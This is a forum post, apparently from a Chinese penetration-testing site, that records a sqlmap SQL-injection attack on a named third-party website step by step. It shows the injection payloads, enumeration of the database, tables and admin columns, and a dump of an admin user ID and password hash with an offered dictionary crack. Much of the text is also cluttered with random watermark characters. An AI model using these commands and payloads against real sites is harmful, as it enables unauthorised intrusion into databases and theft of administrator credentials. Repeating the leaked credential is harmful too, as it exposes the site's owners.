中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]
作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 o/ i( B; I3 T/ N7 ?! U! \0 u
ms "Mysql" --current-user       /*  注解:获取当前用户名称2 U5 z; z0 F( c; G) E7 s! m
    sqlmap/0.9 - automatic SQL injection and database takeover tool
# a. Y4 u$ H$ B4 v    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    ( [- A  M5 U, x+ a7 V2 Q. k[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    2 c8 V/ F4 G2 i' O; n1 y/ v( ] session file
    : H# `# p: A1 _  ][16:53:54] [INFO] resuming injection data from session file; ?0 s1 b6 r3 K2 j# r6 j
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file  }) d. d! Q9 F. f2 v; s
    [16:53:54] [INFO] testing connection to the target url
    2 j2 a/ I3 A$ x  x- \$ y$ t; Qsqlmap identified the following injection points with a total of 0 HTTP(s) reque7 T/ C/ J0 ?0 c- t% y* H' T0 S
    sts:1 V% U3 w' |, j) J& {; S" `
    ---
    + R( p+ P, v9 ]! g: `0 `& yPlace: GET% V) S4 W6 `( n0 _
    Parameter: id0 n# J" G1 m( l) [0 D5 [6 i
        Type: boolean-based blind
    * s3 n; D) R! _8 b: P2 }    Title: AND boolean-based blind - WHERE or HAVING clause/ V; l) l$ t3 p
        Payload: id=276 AND 799=7991 X9 r& ]  _  }  q! _- R
        Type: error-based) O) F- [( E7 m* C- [4 C
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 M$ U* L. e1 Z$ z; a" H
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    5 V' }+ k+ u9 D0 x# n+ V6 a2 g120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 J6 o! E- |6 m' `+ K0 m
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), I9 C0 E! S1 H  {- `& d) c
        Type: UNION query+ \& |) m% d2 E- p/ `* }0 W
        Title: MySQL UNION query (NULL) - 1 to 10 columns. ^% K1 F" Z& t
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" a7 p* A5 u2 U% P0 L' R" X
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' s" h# y/ B& e' [
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 h2 ~0 y, I7 P" V4 ?! q/ d
        Type: AND/OR time-based blind$ Z) q+ Z) {4 w: [
        Title: MySQL > 5.0.11 AND time-based blind. I5 ?( T% v& D7 E
        Payload: id=276 AND SLEEP(5)' ^) ^6 e- g; V9 `8 D- c6 {, P$ }
    ---
    . P- D& a$ ]4 F, c[16:53:55] [INFO] the back-end DBMS is MySQL9 n4 m/ r9 Z  P! Z8 u
    web server operating system: Windows% k- ?! w2 n, U( K: j+ c
    web application technology: Apache 2.2.11, PHP 5.3.0! [# p9 N  \7 k4 F2 Y# C
    back-end DBMS: MySQL 5.0$ w' z- K& A( z: }: ~
    [16:53:55] [INFO] fetching current user) d& P+ P: d( y3 K# g, f( ?2 l
    current user:    'root@localhost'   " h; _; h2 p/ k* y- f, ~& @; E9 f% ?& C
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou) J- H; w( n& H# i0 [, l  _5 E
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58" G4 H4 `* ]) `6 w! y6 }/ B
    6 e0 S1 o, c1 z7 H& C% K
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    3 J9 [/ b, l+ U$ b- Ems "Mysql" --current-db                  /*当前数据库1 [4 f5 a& X7 z
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    8 r+ z$ ^- @1 k    http://sqlmap.sourceforge.net
  • starting at: 16:54:16" J% `8 I' a4 y5 e2 m; v# h7 R* {5 R
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    9 ~( f8 f9 R  @9 h session file
    7 E' s- r5 {# `- B[16:54:16] [INFO] resuming injection data from session file
    ' Z( M% E  i' Y( F[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ U/ R, Q0 x4 n& b
    [16:54:16] [INFO] testing connection to the target url4 `  o3 B9 u! X: ^) {
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    0 W  a  l+ [% W- v2 o7 l6 zsts:
    ) ^6 s" Z- d4 N7 t7 k---
    2 ]4 W9 H9 k' Q0 O' k" u. A+ OPlace: GET
    # u7 j" `3 ?0 b7 ?# y9 p9 dParameter: id4 w% ~, C! ^' H& w" C
        Type: boolean-based blind1 O9 o0 m+ S5 d' n% w+ p
        Title: AND boolean-based blind - WHERE or HAVING clause8 H3 ^3 \2 {9 }" d: M6 ~! _1 Z
        Payload: id=276 AND 799=799* @! D% F6 f; u; ?
        Type: error-based% ?' m& d6 y9 s+ ~* c6 t
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ! |3 R  K7 B- V2 v    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ b" J. [1 j3 L! b8 d
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    . l% J# k% R2 G& R! r: f- M),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ; C1 R  t6 A- f& X5 k    Type: UNION query
    ; v$ G7 @% N6 Y0 y) V7 \1 W6 `    Title: MySQL UNION query (NULL) - 1 to 10 columns
      g- Y6 j: m+ r    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    2 T4 V- G; x, o0 s( ]6 Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! s# M/ Q$ f5 ~" M
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ j! H/ a: h4 j
        Type: AND/OR time-based blind
    " Y% Z; ~; V4 {! }9 y    Title: MySQL > 5.0.11 AND time-based blind. z0 m  R- E; A
        Payload: id=276 AND SLEEP(5)! M7 u/ y2 v! G; v
    ---5 Z6 J) p6 ]/ o+ ^  d4 q% c
    [16:54:17] [INFO] the back-end DBMS is MySQL3 `( V1 `2 q7 \# W% Q7 b; v
    web server operating system: Windows
    - m0 d) E4 q3 L. ~: fweb application technology: Apache 2.2.11, PHP 5.3.0
    / r" U+ w9 a4 t  B* Yback-end DBMS: MySQL 5.0) F% B+ H& Y- j
    [16:54:17] [INFO] fetching current database
    % E# A7 G8 L  T+ b) B6 ^2 X4 Pcurrent database:    'wepost'
    1 S: z0 a: V6 ~! y+ x3 o[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    5 a6 e: h2 Q" b9 y! ?8 r$ qtput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    + L0 R0 M( x7 x* B: ID:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    / j) W; c8 e* l' R$ h) ^ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名5 Y  @: f1 ^* d; g8 A+ X3 J
        sqlmap/0.9 - automatic SQL injection and database takeover tool7 ?, |: m8 ^# N, {1 [* P
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    " ^3 @) P# h7 d+ N- M0 v+ Q- W[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    4 _9 K9 @( P6 \4 |' y" m" N# a3 ~* c' X session file
    $ u+ x: \6 h9 ^[16:55:25] [INFO] resuming injection data from session file* ~9 j* c- Y) m# Z% L& e
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file" u. y  {, j1 K+ Z3 Z5 g& s
    [16:55:25] [INFO] testing connection to the target url5 F7 f. P) s: C/ E  a# |; C  C
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 P9 {! I$ Y% L9 q# J- D6 x
    sts:
    3 ^: _! [) k0 f2 S2 C6 W# K---
    ' ^; _$ l6 ?+ ?7 YPlace: GET
    ! m5 V: E- k: U, r5 _$ lParameter: id
    + A) T; O& u: b. B    Type: boolean-based blind
    + O; Z( @) G7 s  s: x    Title: AND boolean-based blind - WHERE or HAVING clause
    + \* o2 C# ?. E5 F) R3 J    Payload: id=276 AND 799=799
    9 P6 U0 d  n$ w, X    Type: error-based
    & @) M. ]( z* m$ Q) t    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    1 [- ^# x7 F& o7 ]    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    , I! o$ T2 u& y6 m120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    - R8 G( U2 d* C" Q& [, e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 ]! L* I" Q7 y) _* s. e+ t- i1 L/ h    Type: UNION query
    1 o# D7 p  e. Q, r, S    Title: MySQL UNION query (NULL) - 1 to 10 columns7 T; _5 O* D: D+ w+ p0 q
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* w0 m! H( f! W7 b4 a& \
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    0 g8 x( b7 c' \" FCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' e7 `9 a1 f: h/ ^: I, e3 [
        Type: AND/OR time-based blind" {$ v, P3 {: T4 s  n0 ~
        Title: MySQL > 5.0.11 AND time-based blind
    3 P) f" O( u' Q/ [+ Y    Payload: id=276 AND SLEEP(5)
    ' K! w  V* {8 S, L( v  T# N  a---
    - j0 P0 C( S4 n0 K: B) {- m( b[16:55:26] [INFO] the back-end DBMS is MySQL7 A+ p- Y, W) L
    web server operating system: Windows5 e. |6 L4 j7 H8 N& C$ u
    web application technology: Apache 2.2.11, PHP 5.3.0
    ' r1 i8 M2 ]$ K  ?- Iback-end DBMS: MySQL 5.0
    6 s. w5 D+ Q" ^, y0 N# D( }2 V[16:55:26] [INFO] fetching tables for database 'wepost'
    5 W- F2 {, k1 F, ^4 F[16:55:27] [INFO] the SQL query used returns 6 entries
    1 T& b- h8 B0 K) _5 r' ZDatabase: wepost  b& m# C/ }' U# n" x7 E
    [6 tables]
    # A6 k0 s& a! P9 g7 V+-------------+! u7 `9 ^/ k3 x4 x  V
    | admin       |; f6 x8 K. W: ^: T+ {
    | article     |
    / f) l8 t# J( e3 Q9 S| contributor |
      J2 Y( W# A. h! T+ I" ~| idea        |
    4 f; B" f$ _, S3 T0 L! R| image       |
    - Y0 U5 \, S) u/ Z, O4 x3 f3 D# \| issue       |! N+ T: L3 u: `1 n+ E* l3 \
    +-------------+
    7 M% H" v3 Q7 O; w[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    & x. w! M8 m+ ?. vtput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    9 F1 @+ L! T5 M& e4 [" ~1 l+ l. S5 W' H7 n7 D8 D% A
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 D* t4 j; ]$ ]' \# O" V* X4 g& x
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    4 E) i8 g2 p# y) |+ J    sqlmap/0.9 - automatic SQL injection and database takeover tool
    8 N5 ]/ X& r9 g4 ]( z5 {    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    4 ]3 g5 r' e( Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    , \# P+ k5 ]& Ists:0 K8 a4 m' P! g5 G
    ---$ o$ @( [& j9 ~. y$ q5 E6 j
    Place: GET/ V5 e4 Y/ N0 j
    Parameter: id
    / _. d! }: Z) k: U( w& x$ {/ n$ ?0 g    Type: boolean-based blind
    / X) t9 D: B: M: v3 S1 L& T    Title: AND boolean-based blind - WHERE or HAVING clause
    3 ~& v5 `5 D$ N6 ^2 `% [9 s% d    Payload: id=276 AND 799=799; }: P) }3 q8 c& W! Y+ F
        Type: error-based
    ) W( J7 Y2 h' e* w    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ( d1 V5 S( E8 F    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 h$ Y# M5 C5 W4 D
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ( J! U$ L. U* v4 Y" l. C),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' p+ }  P0 Z# ~
        Type: UNION query
    9 y9 C9 H0 H! S" w    Title: MySQL UNION query (NULL) - 1 to 10 columns- s4 o: t7 ^. P1 I+ o
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ u  F* ~! @+ ^8 y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) e: o* \) t2 _) D
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 N, o) n; X! X! E* n
        Type: AND/OR time-based blind  t" @/ u1 r8 i3 m
        Title: MySQL > 5.0.11 AND time-based blind
    / m) _3 x$ Y$ W" i" G& T7 o    Payload: id=276 AND SLEEP(5)
    + w  T$ H6 W5 i3 `( W# P; N+ ^---
    6 E! T9 N) [: Bweb server operating system: Windows9 r. O4 P5 C6 N6 I' S
    web application technology: Apache 2.2.11, PHP 5.3.00 ~7 r! A3 o, H; E. V) c2 D
    back-end DBMS: MySQL 5.0  m# h4 S: T) p* n% O( y) ^
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    ; _9 w* a  v8 [% @' h6 d, Zssion': wepost, wepost* ?3 `, {  }& m
    Database: wepost3 u# b4 k( h/ H* e* p
    Table: admin
    ' e0 E# q% [0 W$ y  T% b# U9 y  y  B[4 columns]
    ' I) o3 c. |+ A9 J' h+ @) Q+----------+-------------+
    5 t$ n: U( R4 G7 T; a$ D| Column   | Type        |
    5 M6 N& T' V7 @. n& k) c+----------+-------------+
    9 _5 V! U, v/ V8 h* G/ `| id       | int(11)     |7 h3 s; v% B( o/ h: k" K5 g
    | password | varchar(32) |
    & ~# Q* q7 k, J, I' A$ {) p! [| type     | varchar(10) |
    : f  X9 X" [: _: {| userid   | varchar(20) |6 {+ M/ O6 ~1 Y( ]6 u5 t2 I
    +----------+-------------+
    7 V2 `4 M6 l3 z( p
  • shutting down at: 16:56:198 e" @% u6 d' P$ d2 A

    6 y* s) m* c6 b! }3 u9 tD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    : M" Y9 c( f' N' o7 T; gms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容% y" j$ j' X7 d# Z/ h( q. s; u
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    * `9 @- i% r1 Q) W* i    http://sqlmap.sourceforge.net
  • starting at: 16:57:147 c) Y( ^' q% @/ K; Y0 [
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 u- t0 |1 w# Q2 H; m1 V! N+ d
    sts:
    2 q; A: a: ]- [! c& ]---  S0 v) [6 q7 g
    Place: GET3 B% u& b6 J7 f8 v. J  D* K
    Parameter: id
    ' ?7 ~+ h; i/ X; O5 L8 F9 @/ k0 j    Type: boolean-based blind" p7 Z; p. ^  Z1 Y" q
        Title: AND boolean-based blind - WHERE or HAVING clause. ?8 x. i1 R! j. J4 r! ?0 D
        Payload: id=276 AND 799=7997 @, @/ o9 x) G* Y% c
        Type: error-based
    % b4 U& d! @0 S    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; [9 E# y) u! L
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    . |. z5 X6 o$ U& d% `120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 E- ^5 X1 {( m5 ]6 \! ?2 u  T6 K
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    2 S& a) }$ Q" ?5 V  r    Type: UNION query% }; T! A9 u: I3 N4 {: k) A% j$ m. {
        Title: MySQL UNION query (NULL) - 1 to 10 columns' K9 O: R$ d/ T2 Y, ]) r
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    4 {& s, K1 f, w3 y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    * V5 k" V! R+ t- R* C, B) {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#& d# G1 }# E+ V7 p+ w
        Type: AND/OR time-based blind5 |. T$ {7 W7 \3 h& {! W; Z' v
        Title: MySQL > 5.0.11 AND time-based blind9 b& }4 C2 g6 k
        Payload: id=276 AND SLEEP(5)
    : o6 ^; G0 d3 F7 k0 i- N# w, h, |7 ~---
    2 y5 m" v" q8 P$ X7 N) h9 Tweb server operating system: Windows
    7 U; [# C: N) a5 `" j' Fweb application technology: Apache 2.2.11, PHP 5.3.0' i: F9 B+ I2 a% s+ I6 d
    back-end DBMS: MySQL 5.0
    , A+ _) y: u' W( urecognized possible password hash values. do you want to use dictionary attack o
    6 y4 k3 ^2 H+ On retrieved table items? [Y/n/q] y
    6 `4 O. f7 K+ ]# ^# K/ G. ^' Cwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]9 D4 @7 j. ~& D
    do you want to use common password suffixes? (slow!) [y/N] y% V; F2 {; F/ i$ r' J; y
    Database: wepost
    1 j) e) u1 f$ kTable: admin
    # P6 p3 C* N  O$ g[1 entry]4 h7 G9 F  Q, _* ~1 g( T2 n- b
    +----------------------------------+------------+2 f+ {0 V$ ^* ]  \' Q6 k
    | password                         | userid     |
    2 S# Y) R" t: J2 K. G+ i+----------------------------------+------------+% B' E' k  `* N
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    " k$ d. \! M! }: P1 `5 @2 e" x8 G+----------------------------------+------------+4 B; u9 e1 P/ l
  • shutting down at: 16:58:14
    : b8 Z2 Q1 \* l  C
    9 g+ S1 T$ H  _# n: fD:\Python27\sqlmap>



    欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2